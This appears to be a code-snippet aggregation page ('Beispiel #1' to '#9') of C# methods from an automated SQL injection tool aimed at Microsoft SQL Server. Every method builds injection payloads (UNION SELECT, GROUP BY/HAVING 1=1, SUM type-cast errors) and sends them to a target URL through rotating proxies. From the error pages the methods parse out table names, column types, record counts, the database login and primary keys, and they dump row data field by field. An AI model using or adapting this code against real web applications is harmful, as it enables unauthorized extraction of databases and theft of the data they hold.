Beispiel #1
0
        private void TypeCastAttackVector()
        {
            StringBuilder CurrentVector = new StringBuilder();

            for (int FieldCounter = 0; FieldCounter < _QueryStructure.Count; FieldCounter++)
            {
                UserStatus(String.Format("Counter is at {0} of {1}", FieldCounter, _QueryStructure.Count));

                CurrentVector = new StringBuilder();
                CurrentVector.Append(_VectorBuffer).Append(" UNION SELECT SUM(");
                CurrentVector.Append(((GlobalDS.Field)_QueryStructure[FieldCounter]).FullName);
                CurrentVector.Append(") FROM ");
                CurrentVector.Append(((GlobalDS.Field)_QueryStructure[FieldCounter]).TableName);
                CurrentVector.Append("--");

                _AttackParams[_VectorName] = CurrentVector.ToString();

                string ResultPage;
                UserStatus(String.Format("hmm: {0}", CurrentVector.ToString()));
                ResultPage = httpConnect.PageRequest(_TargetURL, _AttackParams, RotatedProxy(), _ConnectViaPost, _Options.Cookies, _Options.AuthCredentials, _Options.UserAgent);

                GlobalDS.Field dbg = (GlobalDS.Field)_QueryStructure[FieldCounter];
                dbg.DataType = ParsePage.ParseUnionSumError(ResultPage, _Plugin);

                // ## DEBUG
                UserStatus(String.Format("Resulting Data: {0} - {1}", dbg.FullName, dbg.DataType));
                _QueryStructure[FieldCounter] = dbg;
            }

            UserStatus("Finished Typecasting..");
        }
Beispiel #2
0
        private GlobalDS.Field GetFieldData(long TableID, int FieldID)
        {
            GlobalDS.Field retVal = new GlobalDS.Field();

            StringBuilder WhereClause = new StringBuilder();

            WhereClause.Append("id=").Append(TableID).Append(" and colid > ").Append(FieldID);

            _AttackParams[_VectorName] = GeneralPurposeUnionTextSelect("name + char(58)+convert(char,xtype)", "syscolumns", WhereClause.ToString());


            string ResultPage = httpConnect.PageRequest(_TargetURL, _AttackParams, RotatedProxy(), _ConnectViaPost, _Options.Cookies, _Options.AuthCredentials, _Options.UserAgent);

            string PulledData = ParsePage.ParseUnionSelectForNvarchar(ResultPage, _Plugin);

            string[] values = PulledData.Split(':');

            retVal.FieldName = values[0];
            retVal.DataType  = GetSqlDataType(Convert.ToInt64(values[1].Trim()));

            _AttackParams[_VectorName] = GeneralPurposeUnionTextSelect("char(58) + convert(char, status)", "sysconstraints", "id=" + TableID + " and colid=" + FieldID);
            ResultPage = httpConnect.PageRequest(_TargetURL, _AttackParams, RotatedProxy(), _ConnectViaPost, _Options.Cookies, _Options.AuthCredentials, _Options.UserAgent);

            PulledData = ParsePage.ParseUnionSelectForVarchar(ResultPage, _Plugin);

            if (PulledData.Length > 0)
            {
                PulledData       = PulledData.Substring(1, PulledData.Length - 1);
                retVal.IsPrimary = ((Convert.ToInt32(PulledData.Trim()) & 1) == 1);
            }

            return(retVal);
        }
Beispiel #3
0
        private GlobalDS.Table RetrieveTable(long PreviousTableID)
        {
            GlobalDS.Table retVal = new GlobalDS.Table();

            _AttackParams[_VectorName] = GeneralPurposeUnionTextSelect("convert(int, name + char(58) + convert(char, id))", "sysobjects", "xtype=char(85) and id > " + PreviousTableID.ToString());

            string ResultPage, ResultText;

            ResultPage = httpConnect.PageRequest(_TargetURL, _AttackParams, RotatedProxy(), _ConnectViaPost, _Options.Cookies, _Options.AuthCredentials, _Options.UserAgent);
            ResultText = ParsePage.ParseUnionSelectForNvarchar(ResultPage, _Plugin);

            string[] values = ResultText.Split(':');

            retVal.Name     = values[0];
            retVal.ObjectID = Convert.ToInt64(values[1]);

            _AttackParams[_VectorName] = GeneralPurposeUnionTextSelect("convert(int, char(58) + convert(char, count(*)))", values[0], null);

            ResultPage = httpConnect.PageRequest(_TargetURL, _AttackParams, RotatedProxy(), _ConnectViaPost, _Options.Cookies, _Options.AuthCredentials, _Options.UserAgent);
            ResultText = ParsePage.ParseUnionSelectForVarchar(ResultPage, _Plugin);

            if (ResultText.Length > 0)
            {
                ResultText = ResultText.Substring(1, ResultText.Length - 1);

                retVal.RecordCount = Convert.ToInt64(ResultText.Trim());
            }
            else
            {
                retVal.RecordCount = -1;
            }
            return(retVal);
        }
Beispiel #4
0
        private void EnumerateAttackVector()
        {
            StringBuilder CurrentVector;

            // Initiate "Having" enumeration
            GlobalDS.Field newField;

            _QueryStructure = new List <GlobalDS.Field>();

            do
            {
                CurrentVector = new StringBuilder();
                CurrentVector.Append(_VectorBuffer);

                // This is where the GROUP BY clause is added
                if (_QueryStructure.Count > 0)
                {
                    CurrentVector.Append(" GROUP BY");

                    for (int FieldCounter = 0; FieldCounter < _QueryStructure.Count; FieldCounter++)
                    {
                        CurrentVector.Append(" ");
                        CurrentVector.Append(((GlobalDS.Field)_QueryStructure[FieldCounter]).FullName);
                        CurrentVector.Append(",");
                    }

                    CurrentVector.Remove(CurrentVector.Length - 1, 1);
                }

                CurrentVector.Append(" HAVING 1=1");

                if (_Options.TerminateQuery)
                {
                    CurrentVector.Append("--");
                }

                _AttackParams[_VectorName] = CurrentVector.ToString();

                string ResultPage;
                ResultPage = httpConnect.PageRequest(_TargetURL, _AttackParams, RotatedProxy(), _ConnectViaPost, _Options.Cookies, _Options.AuthCredentials, _Options.UserAgent);

                System.Console.WriteLine(ResultPage);

                newField = ParsePage.ParseGroupedHaving(ResultPage, _Plugin);

                if (newField.FieldName.Length > 0)
                {
                    _QueryStructure.Add(newField);
                    UserStatus(String.Format("QueryStructure Size After adding: {0}", _QueryStructure.Count));
                }
                else
                {
                    UserStatus(ResultPage);
                }
            }while (newField.FieldName.Length > 0);

            System.Console.WriteLine("Done Enumeration, I think");
        }
Beispiel #5
0
        private void RefinedTypeCasting()
        {
            StringBuilder CurrentVector = new StringBuilder();

            List <int> IntList = FindAllVariInts(_QueryStructure);

            for (int IntCounter = 0; IntCounter < IntList.Count; IntCounter++)
            {
                UserStatus("Refining Integer #" + IntCounter);

                CurrentVector = new StringBuilder();
                CurrentVector.Append(_VectorBuffer).Append(" UNION ALL SELECT ");


                for (int FieldCounter = 0; FieldCounter < _QueryStructure.Count; FieldCounter++)
                {
                    if (FieldCounter == (int)IntList[IntCounter] || ((GlobalDS.Field)_QueryStructure[FieldCounter]).DataType == System.Data.SqlDbType.VarChar ||
                        ((GlobalDS.Field)_QueryStructure[FieldCounter]).DataType == System.Data.SqlDbType.Char ||
                        ((GlobalDS.Field)_QueryStructure[FieldCounter]).DataType == System.Data.SqlDbType.NVarChar)
                    {
                        //CurrentVector.Append("@@version,");
                        CurrentVector.Append("char(0x61),");
                    }                    // Text and NText are a pain in the ASS
                    else if (((GlobalDS.Field)_QueryStructure[FieldCounter]).DataType == System.Data.SqlDbType.Text ||
                             ((GlobalDS.Field)_QueryStructure[FieldCounter]).DataType == System.Data.SqlDbType.NText ||
                             ((GlobalDS.Field)_QueryStructure[FieldCounter]).DataType == System.Data.SqlDbType.Variant)
                    {
                        CurrentVector.Append("NULL,");
                    }

                    else
                    {
                        UserStatus(String.Format("Refining {0}", ((GlobalDS.Field)_QueryStructure[FieldCounter]).DataType));
                        CurrentVector.Append("1,");
                    }
                }
                CurrentVector.Remove(CurrentVector.Length - 1, 1);

                CurrentVector.Append(" ORDER BY 1--");

                _AttackParams[_VectorName] = CurrentVector.ToString();

                string ResultPage;

                ResultPage = httpConnect.PageRequest(_TargetURL, _AttackParams, RotatedProxy(), _ConnectViaPost, _Options.Cookies, _Options.AuthCredentials, _Options.UserAgent);

                GlobalDS.Field AdjustedField = (GlobalDS.Field)_QueryStructure[(int)IntList[IntCounter]];

                AdjustedField.DataType = ParsePage.ParseUnionSelectForIntegerRefinement(ResultPage, _Plugin);

                _QueryStructure[(int)IntList[IntCounter]] = AdjustedField;
            }

            UserStatus("Finished Refining Typecasts");
        }
Beispiel #6
0
        private long GetTableCount()
        {
            _AttackParams[_VectorName] = GeneralPurposeUnionTextSelect("char(58)+convert(char,count(name))+char(58)", "sysobjects", "xtype=char(85)");

            string ResultPage  = httpConnect.PageRequest(_TargetURL, _AttackParams, RotatedProxy(), _ConnectViaPost, _Options.Cookies, _Options.AuthCredentials, _Options.UserAgent);
            string PulledCount = ParsePage.ParseUnionSelectForVarchar(ResultPage, _Plugin);

            PulledCount = PulledCount.Substring(1, PulledCount.Length - 2).Trim();

            return(Convert.ToInt64(PulledCount));
        }
Beispiel #7
0
        /// <summary>
        /// Pull the username the database is running as
        /// </summary>
        /// <returns>The database username</returns>
        public string GetDatabaseUsername()
        {
            _AttackParams[_VectorName] = GeneralPurposeUnionTextSelect("char(40) + SYSTEM_USER + char(41)", null, null);

            string ResultPage;

            ResultPage = httpConnect.PageRequest(_TargetURL, _AttackParams, RotatedProxy(), _ConnectViaPost, _Options.Cookies, _Options.AuthCredentials, _Options.UserAgent);

            string Username = ParsePage.ParseUnionSelectForNvarchar(ResultPage, _Plugin);

            return(Username.Substring(1, Username.Length - 2));          // remove brackets
        }
Beispiel #8
0
        private GlobalDS.PrimaryKey IteratePrimaryKey(string TableName, string KeyName, GlobalDS.PrimaryKey CurrentPrimaryKey, SqlDbType PrimaryKeyType)
        {
            StringBuilder WhereClause = new StringBuilder();

            if (CurrentPrimaryKey.Name == KeyName)
            {
                WhereClause.Append(KeyName).Append(" > ").Append(CurrentPrimaryKey.Value);
            }

            _AttackParams[_VectorName] = GeneralPurposeUnionTextSelect("char(58) + convert(char, min(" + KeyName + ")) + char(58)", TableName, WhereClause.ToString());

            string ResultPage = httpConnect.PageRequest(_TargetURL, _AttackParams, RotatedProxy(), _ConnectViaPost, _Options.Cookies, _Options.AuthCredentials, _Options.UserAgent);
            string ResultText = ParsePage.ParseUnionSelectForVarchar(ResultPage, _Plugin);

            ResultText = ResultText.Substring(1, ResultText.Length - 2);

            string WorkingText = "";

            switch (PrimaryKeyType)
            {
            case SqlDbType.VarChar:
            case SqlDbType.Char:
            case SqlDbType.NChar:
            case SqlDbType.NText:
            case SqlDbType.NVarChar:
            case SqlDbType.Text:
                StringBuilder ElementBuilder = new StringBuilder();

                //split
                char[] TextElements = ResultText.ToCharArray();
                for (int i = 0; i < TextElements.Length; i++)
                {
                    ElementBuilder.Append("char(").Append(Char.GetNumericValue(TextElements[i])).Append(") + ");
                }
                ElementBuilder.Remove(ElementBuilder.Length - 2, 2);                       // remove trailing '+ '

                WorkingText = ElementBuilder.ToString();
                break;

            default:
                WorkingText = ResultText.Trim();
                break;
            }



            GlobalDS.PrimaryKey retVal = new GlobalDS.PrimaryKey();
            retVal.Name        = KeyName;
            retVal.Value       = WorkingText;
            retVal.OutputValue = ResultText;

            return(retVal);
        }
Beispiel #9
0
        // }}}

        // {{{ GetFieldData
        private DictionaryEntry GetFieldData(string TableName, GlobalDS.Field Column, GlobalDS.PrimaryKey pk)
        {
            DictionaryEntry retVal = new DictionaryEntry();

            retVal.Key   = Column.FieldName;
            retVal.Value = string.Empty;

            if (Column.FieldName.Equals(pk.Name))
            {
                retVal.Value = pk.Value;
                return(retVal);
            }

            StringBuilder SelectClause = new StringBuilder();


            switch (Column.DataType)
            {
            case SqlDbType.BigInt:
            case SqlDbType.SmallInt:
            case SqlDbType.TinyInt:
            case SqlDbType.Int:
            case SqlDbType.Decimal:
            case SqlDbType.DateTime:
            case SqlDbType.Money:
            case SqlDbType.Float:
            case SqlDbType.Real:
            case SqlDbType.SmallDateTime:
            case SqlDbType.SmallMoney:
            case SqlDbType.Timestamp:
            case SqlDbType.UniqueIdentifier:
                //retVal.Value = OpenEndedIntegerSearch(Column.FieldName, TableName, pk);
                SelectClause.Append("char(58) + convert(nvarchar, ").Append(Column.FieldName).Append(") + char(58)");

                break;

            case SqlDbType.NChar:
            case SqlDbType.Char:
            case SqlDbType.NVarChar:
            case SqlDbType.Text:
            case SqlDbType.NText:
            case SqlDbType.VarChar:
                //retVal.Value = GetFieldDataVarChar(Column.FieldName, TableName, pk);
                SelectClause.Append("char(58) + convert(nvarchar, ").Append(Column.FieldName).Append(") + char(58)");
                break;

            case SqlDbType.Bit:
                //retVal.Value = GetBitField(Column.FieldName, TableName, pk);
                SelectClause.Append("char(58) + convert(nvarchar, ").Append(Column.FieldName).Append(") + char(58)");
                break;

            case SqlDbType.Image:
            case SqlDbType.Binary:
            case SqlDbType.VarBinary:
                // TODO: Figure out how to support this!
                //retVal.Value = null;
                break;
            }

            _AttackParams[_VectorName] = GeneralPurposeUnionTextSelect(SelectClause.ToString(), TableName, pk.Name + " = " + pk.Value);


            string ResultPage = httpConnect.PageRequest(_TargetURL, _AttackParams, RotatedProxy(), _ConnectViaPost, _Options.Cookies, _Options.AuthCredentials, _Options.UserAgent);
            string ResultText = ParsePage.ParseUnionSelectForNvarchar(ResultPage, _Plugin);

            retVal.Value = ResultText.Substring(1, ResultText.Length - 2);

            return(retVal);
        }